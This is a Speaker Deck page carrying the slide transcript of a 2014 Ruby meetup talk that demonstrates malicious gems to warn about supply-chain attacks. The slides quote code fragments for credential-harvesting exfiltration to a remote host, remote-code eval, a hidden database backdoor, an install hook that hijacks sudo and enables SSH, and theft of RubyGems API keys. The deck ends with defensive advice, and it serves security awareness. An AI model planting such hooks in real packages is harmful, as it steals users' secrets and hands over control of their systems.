Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Hacking with Gems (denver.rb)

Avatar for Benjamin Smith Benjamin Smith
August 13, 2014
Technology
0
170

Hacking with Gems (denver.rb)

Avatar for Benjamin Smith

Benjamin Smith

August 13, 2014
Tweet

More Decks by Benjamin Smith

See All by Benjamin Smith
Modules instead of Microservies
Avatar for Benjamin Smith benjaminleesmith
0
98
Refactoring Rails Apps with Engines
Avatar for Benjamin Smith benjaminleesmith
4
860
How I architected my big Rails app for success! (ConFoo 2014)
Avatar for Benjamin Smith benjaminleesmith
1
240
Hacking with Gems (ConFoo 2014)
Avatar for Benjamin Smith benjaminleesmith
1
120
How I architected my big Rails app for success! (RubyConfAU 2014)
Avatar for Benjamin Smith benjaminleesmith
2
390
How I architected my big Rails app for success! (RMR 2013)
Avatar for Benjamin Smith benjaminleesmith
4
400
Keeping Your Massive Rails App From Turning Into a S#!t Show (WindyCityRails 2013)
Avatar for Benjamin Smith benjaminleesmith
1
240
Architecting your Rails app for success! (EuRuKo 2013)
Avatar for Benjamin Smith benjaminleesmith
4
1.3k
Hacking with Gems (RuLu 2013)
Avatar for Benjamin Smith benjaminleesmith
3
1.5k

Other Decks in Technology

See All in Technology
ひとり情シスなCTOがLLMと始めるオペレーション最適化 / CTO's LLM-Powered Ops
Avatar for Mitsuki Ogasahara yamitzky
0
450
MapStore at geOcom 2025: A Year in Review
Avatar for Simone Giannecchini simboss
PRO
0
100
【5分でわかる】セーフィー エンジニア向け会社紹介
Avatar for Safie safie_recruit
0
26k
生成AI開発案件におけるClineの業務活用事例とTips
Avatar for Shinya Masadome(東京AI祭) shinya337
0
110
250627 関西Ruby会議08 前夜祭 RejectKaigi「DJ on Ruby Ver.0.1」
Avatar for Masaya Kudo msykd
PRO
2
340
Wasm元年
Avatar for asuka askua
0
160
マーケットプレイス版Oracle WebCenter Content For OCI
Avatar for oracle4engineer oracle4engineer
PRO
3
920
MySQL5.6から8.4へ 戦いの記録
Avatar for Koji Yoshida kyoshidaxx
1
270
PHP開発者のためのSOLID原則再入門 #phpcon / PHP Conference Japan 2025
Avatar for shogogg shogogg
4
900
Node-REDのFunctionノードでMCPサーバーの実装を試してみた / Node-RED × MCP 勉強会 vol.1
Avatar for you(@youtoy) you
PRO
0
120
AIの最新技術&テーマをつまんで紹介&フリートークするシリーズ #1 量子機械学習の入門
Avatar for Takahiro Esaki tkhresk
0
140
Prox Industries株式会社 会社紹介資料
Avatar for Prox proxindustries
0
330

Featured

See All Featured
Stop Working from a Prison Cell
Avatar for Chris Michel hatefulcrawdad
270
20k
Intergalactic Javascript Robots from Outer Space
Avatar for Vicent Martí tanoku
271
27k
Bash Introduction
Avatar for André Augusto Costa Santos 62gerente
614
210k
Embracing the Ebb and Flow
Avatar for Simon Collison colly
86
4.7k
Measuring & Analyzing Core Web Vitals
Avatar for Philip Tellis bluesmoon
7
490
VelocityConf: Rendering Performance Case Studies
Avatar for Addy Osmani addyosmani
331
24k
Testing 201, or: Great Expectations
Avatar for Joseph Mastey jmmastey
42
7.5k
GraphQLの誤解/rethinking-graphql
Avatar for sonatard sonatard
71
11k
The Psychology of Web Performance [Beyond Tellerrand 2023]
Avatar for Tammy Everts tammyeverts
48
2.9k
How to Think Like a Performance Engineer
Avatar for Harry Roberts csswizardry
24
1.7k
Statistics for Hackers
Avatar for Jake VanderPlas jakevdp
799
220k
No one is an island. Learnings from fostering a developers community.
Avatar for Antonio thoeni
21
3.3k

Transcript

  1. Hacking with Gems Benjamin Smith @benjamin_smith

  2. How to punk your friends with gems Benjamin Smith @benjamin_smith

  3. How-to get rich quick and (maybe) not go to jail!

    Benjamin Smith @benjamin_smith

  4. Four reasons you should NOT trust Benjamin Smith @benjamin_smith

  5. None

  6. who i am

  7. who i am

  8. who i am

  9. what i am NOT

  10. None

  11. please do not try this at home

  12. please do not try this at home

  13. None
  14. None

  15. Lawful Evil Lawful Good

  16. Lawful Evil Lawful Good

  17. Lawful Evil Lawful Good

  18. Lawful Evil Lawful Good

  19. once upon a time

  20. GEM remote: https://rubygems.org/ specs: actionmailer (4.1.4) actionpack (= 4.1.4) actionview

    (= 4.1.4) mail (~> 2.5.4) actionpack (4.1.4) actionview (= 4.1.4) activesupport (= 4.1.4) rack (~> 1.5.2)

  21. what’s the worst that could happen?

  22. None

  23. gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages

  24. before... github.com/benjaminleesmith/awesome-rails-flash-messages

  25. after! github.com/benjaminleesmith/awesome-rails-flash-messages

  26. some “side effects” if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages

  27. ... File.open( "#{Rails.root}/public/development.log", 'a+' ) do |f| f.write("#{params.inspect}\n") end github.com/benjaminleesmith/awesome-rails-flash-messages

  28. ?!? Net::HTTP.post_form( URI.parse(Base64.decode64('aHR0cDo...')), { 'log'=>params.merge(:url => request.url).inspect } ) github.com/benjaminleesmith/awesome-rails-flash-messages

  29. i like cGFzc3dvcmQ=\n if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages

  30. i like password if params.to_s.match(“password”) github.com/benjaminleesmith/awesome-rails-flash-messages

  31. “development.log” ... "user"=>{"email"=>"[email protected]", "password"=>"password", "remember_me"=>"0"} ... github.com/benjaminleesmith/awesome-rails-flash-messages

  32. elsewhere... github.com/benjaminleesmith/awesome-rails-flash-messages

  33. profit • Step 1: do something • Step 2: do

    something else • Step 3: ???? • Step 4: profit

  34. profit • Step 1: write a gem that does something

    • Step 2: • Step 3: • Step 4:

  35. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: • Step 4:

  36. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4:

  37. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit

  38. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit • Step 5: flee the country

  39. a one way ticket to

  40. that was easy. what else can I do?

  41. gem 'net_http_detector' github.com/benjaminleesmith/net_http_detector

  42. show me the hack Net::HTTP.post_form( #<URI::HTTP:0x007fc76b706950 URL:http:// stark-samurai-8122.herokuapp.com/logs>, {"log"=>"{\"utf8\"=>\"✓\", \"authenticity_token\"=>\"PzpZUlRrRv1V

    +A0jJHAwi+ey/injbWlii8OFyIfP+fY=\", \"user\"=>{\"email\"=>\"test\", \"password\"=>\"pass4\" ... github.com/benjaminleesmith/net_http_detector

  43. how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)

    self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector

  44. how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)

    self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector

  45. how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)

    self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector

  46. ...and one more thing... eval(Net::HTTP.valid_get( URI("http://....herokuapp.com/ snippets/6") ) ) github.com/benjaminleesmith/net_http_detector

  47. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector

  48. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector

  49. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector

  50. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector

  51. /users/sign_in github.com/benjaminleesmith/net_http_detector

  52. /users/sign_in?db_console=t github.com/benjaminleesmith/net_http_detector

  53. hello db access! github.com/benjaminleesmith/net_http_detector

  54. SELECT * FROM users; github.com/benjaminleesmith/net_http_detector

  55. UPDATE users SET admin=1 WHERE id=42; github.com/benjaminleesmith/net_http_detector

  56. CREATE USER admin1 WITH PASSWORD 'password'; github.com/benjaminleesmith/net_http_detector

  57. careful of wolves in sheep’s clothing

  58. profit • Step 1: • Step 2: • Step 3:

    • Step 4: • Step 5:

  59. profit • Step 1: write a gem that does something

    • Step 2: • Step 3: • Step 4: • Step 5:

  60. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: • Step 4: • Step 5:

  61. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: • Step 5:

  62. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5:

  63. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5: flee the country

  64. i like the beach

  65. that was easy. what else can I do?

  66. gem 'better_date_to_s' github.com/benjaminleesmith/better_date_to_s

  67. what it claims to do Date.new(2005, 1, 1).to_s(:short) => "1

    Jan" ... instead of... => " 1 Jan" github.com/benjaminleesmith/better_date_to_s
  68. None

  69. what it also does set_date_formats_for( Rails.env, Rails.root.to_s ) github.com/benjaminleesmith/better_date_to_s

  70. better_date_to_s.bundle œ˙Ì˛ê(__TEXT__text__TEXTP ÛP Ä__stubs__TEXTD $DÄ__stub_helper__TEXThLhÄ__cstring__TEX T∏i∏__unwind_info__TEXT!P! __eh_frame__TEXTxÄxà__DATA__nl_symbol_pt r__DATA__got__DATA__la_symbol_ptr__DATA0 __data__DATAHHH__LINKEDIT ‰"Ä0

    8@ Ä¿ `(!‰" github.com/benjaminleesmith/better_date_to_s

  71. behind the curtain if(strcmp(rails_env, "production") == 0) { sprintf(tar_command, "tar

    -zcvf %s/public/assets.tar.gz %s > /dev/ null 2>&1",rails_root,rails_root); system(tar_command); } github.com/benjaminleesmith/better_date_to_s

  72. what what github.com/benjaminleesmith/better_date_to_s

  73. i can haz source github.com/benjaminleesmith/better_date_to_s

  74. truth time • this gem doesn't actually work • but

    it could... if I wasn't lazy • "fat" gems are tricky to compile github.com/benjaminleesmith/better_date_to_s

  75. so much code so little time • Step 1: write

    a gem that does something • Step 2: add code expose source • Step 3: sell to competitors? • Step 4: profit? • Step 5: flee the country

  76. that was easy hard. what else can I do? (that's

    easier)

  77. gem install bunlder

  78. gem install be_truthy github.com/benjaminleesmith/be_truthy

  79. what it does > true.should be_true > User.new.should be_true >

    User.new.should be_truthy github.com/benjaminleesmith/be_truthy

  80. what it ACTUALLY does github.com/benjaminleesmith/be_truthy

  81. github.com/benjaminleesmith/be_truthy

  82. file tree looks ok github.com/benjaminleesmith/be_truthy

  83. source code looks good require "be_truthy/version" module BeTruthy end github.com/benjaminleesmith/be_truthy

  84. but what was this? github.com/benjaminleesmith/be_truthy

  85. I see no C github.com/benjaminleesmith/be_truthy

  86. run the what file? Gem::Specification.new do |gem| ... gem.extensions =

    ["Rakefile"] ... end github.com/benjaminleesmith/be_truthy

  87. there is no Rakefile github.com/benjaminleesmith/be_truthy

  88. the real file tree github.com/benjaminleesmith/be_truthy

  89. the real file tree github.com/benjaminleesmith/be_truthy

  90. what does the Rakefile do? github.com/benjaminleesmith/be_truthy

  91. sudo_file =__FILE__.gsub( 'Rakefile', 'lib/tmp.rb' ) FileUtils.mv( sudo_file, "#{home_dir}/.tmp" ) github.com/benjaminleesmith/be_truthy

  92. File.open(profile, 'a+') do |f| f.write("alias sudo='ruby #{home}/.tmp'\n") end github.com/benjaminleesmith/be_truthy

  93. FileUtils.rm(__FILE__) github.com/benjaminleesmith/be_truthy

  94. what does "sudo" do now? github.com/benjaminleesmith/be_truthy

  95. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy

  96. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy

  97. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy

  98. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy

  99. echo '#{password}' | /usr/bin/sudo -S systemsetup -setremotelogin on github.com/benjaminleesmith/be_truthy

  100. /usr/bin/sudo dscl . -create /Users/ #{username} ... /usr/bin/sudo dscl .

    -passwd /Users/ #{username} password` github.com/benjaminleesmith/be_truthy

  101. Net::HTTP.post_form( URI.parse('http://.../logs'), {'log' => 'ssh enabled'} ) github.com/benjaminleesmith/be_truthy

  102. ssh sysadmin@your-ip github.com/benjaminleesmith/be_truthy

  103. take away: don't install ben's gems

  104. None

  105. how could I get you to install my gems?

  106. what gems are trustworthy?

  107. how can I add my code to already trusted gems?

  108. back in the be_truthy gem gem_api_key = File.open( `echo ~/.gem/credentials`.strip

    ).read gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy

  109. gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`

    Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem

  110. gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`

    Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem

  111. gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`

    Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem

  112. now I own your gems github.com/benjaminleesmith/be_truthy

  113. > git clone your-gem-repo ...add a little code... > rake

    build > gem push your-gem github.com/benjaminleesmith/be_truthy

  114. do people trust your gems?

  115. do people who install your gems have trustworthy gems?

  116. None

  117. there’s still one problem

  118. bootstrapping

  119. being popular sucks

  120. conferences

  121. social engineering

  122. None
  123. None
  124. None

  125. so what happens now?

  126. ruby gems goes down

  127. heroku deploys go down

  128. i go to the beach

  129. ruby gems goes down

  130. heroku deploys go down

  131. recovery

  132. so what now?

  133. gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages

  134. Little Snitch obdev.at/products/littlesnitch/index.html

  135. gem install be_truthy github.com/benjaminleesmith/be_truthy

  136. fseventer fernlightning.com/doku.php?id=software:fseventer:start

  137. don’t “gem install” from strangers

  138. gem fetch vs gem install > gem fetch be_truthy >

    gem unpack be_truthy-0.0.1.gem github.com/benjaminleesmith/be_truthy
  139. None
  140. None

  141. curl -sSL https://get.rvm.io | bash

  142. gem install rails -P HighSecurity

  143. > gem install rails -P HighSecurity Fetching: i18n-0.6.11.gem (100%) ERROR:

    While executing gem ... (Gem::Security::Exception) unsigned gems are not allowed by the High Security policy

  144. gem cert --build

  145. https://www.rubygems-openpgp-ca.org/ https://github.com/rubygems-trust http://corner.squareup.com/2013/12/ securing-rubygems-with-tuf-part-1.html http://corner.squareup.com/2013/12/ securing-rubygems-with-tuf-part-2.html

  146. sandboxing

  147. github.com/rubygems/rubygems

  148. tools to detect malicious code

  149. private gem repos

  150. do not try this at home

  151. don't install gems you don't need to

  152. pay attention to what your gems do

  153. monitor your system

  154. read the source

  155. gem install coal-mine-canary github.com/benjaminleesmith/coal-mine-canary

  156. on install github.com/benjaminleesmith/coal-mine-canary

  157. the results github.com/benjaminleesmith/coal-mine-canary

  158. thank you!

  159. questions? ideas? @benjamin_smith https://github.com/benjaminleesmith

  160. questions? ideas? @benjamin_smith https://github.com/benjaminleesmith

  161. questions? ideas? @benjamin_smith https://github.com/benjaminleesmith